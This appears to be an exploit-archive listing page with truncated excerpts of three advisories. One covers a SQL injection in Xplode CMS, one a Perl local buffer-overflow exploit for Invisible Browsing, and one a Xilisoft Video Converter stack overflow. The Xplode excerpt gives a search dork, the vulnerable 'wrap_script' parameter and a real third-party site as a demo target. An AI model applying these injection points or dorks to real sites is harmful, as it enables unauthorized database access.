۲۶

بهمن

Xplode CMS – ‘wrap_script’ SQL Injection

Xplode CMS – ‘wrap_script’ SQL Injection   #——————————————————————————————— # scriptname: Xplode Cms # # Xplode SQL Injection Vulnerabilities # # Author: PLATEN # # contact: PLATEN.Secure[at]Gmail.com dork: “Powered by Xplode CMS” #———————————————————————————————- ===[ SQL ]=== http://127.0.0.1/module_wrapper.asp?wrap_script=[sql] example & demo: http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1′ […]

۱۱

بهمن

Invisible Browsing 5.0.52 – ‘.ibkey’ Local Buffer Overflow

Invisible Browsing 5.0.52 – ‘.ibkey’ Local Buffer Overflow #!/usr/bin/perl print qq( ############################################################ ## Iranian Pentesters Home ## ## Www.Pentesters.Ir ## ## PLATEN -[ H.jafari ]- ## ## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit ## ## bug found & exploited […]

۱۰

بهمن

Xilisoft Video Converter Wizard – ‘.yuv’ Stack Buffer Overflow

Xilisoft Video Converter Wizard – ‘.yuv’ Stack Buffer Overflow source: http://www.securityfocus.com/bid/۳۸۸۵۴/info Xilisoft Video Converter is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. Attackers may leverage this issue to execute […]